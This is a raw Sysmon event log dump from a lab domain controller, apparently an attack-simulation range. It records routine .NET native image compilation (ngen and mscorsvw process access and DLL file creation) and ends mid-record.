13:26:37.372{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468D-6000-9404-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.372{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-468D-6000-9404-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.372{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468D-6000-9404-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.325{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468D-6000-9304-000000009A01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.309{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-468D-6000-9304-000000009A01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.309{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468D-6000-9304-000000009A01}5072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:37.247{08A6967A-468D-6000-9204-000000009A01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1014-0\System.Runtime.DurableInstancing.dll2021-01-14 13:26:37.247 10341000x80000000000000008721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.012{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468D-6000-9204-000000009A01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.997{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-468D-6000-9204-000000009A01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.997{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468D-6000-9204-000000009A01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000008743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:38.919{08A6967A-468E-6000-9804-000000009A01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1180-0\System.ServiceModel.Activation.dll2021-01-14 13:26:38.919 10341000x80000000000000008742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.419{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468E-6000-9804-000000009A01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.403{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-468E-6000-9804-000000009A01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.403{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468E-6000-9804-000000009A01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.122{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468E-6000-9704-000000009A01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.106{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-468E-6000-9704-000000009A01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.106{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468E-6000-9704-000000009A01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:38.028{08A6967A-468D-6000-9604-000000009A01}2944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b80-0\System.Security.dll2021-01-14 13:26:38.028 10341000x80000000000000008749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:39.122{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468F-6000-9A04-000000009A01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:39.106{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-468F-6000-9A04-000000009A01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:39.106{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468F-6000-9A04-000000009A01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:39.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468F-6000-9904-000000009A01}1264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.997{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-468F-6000-9904-000000009A01}1264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:38.997{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468F-6000-9904-000000009A01}1264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.966{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4690-6000-9E04-000000009A01}4940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:40.950{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4690-6000-9E04-000000009A01}4940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 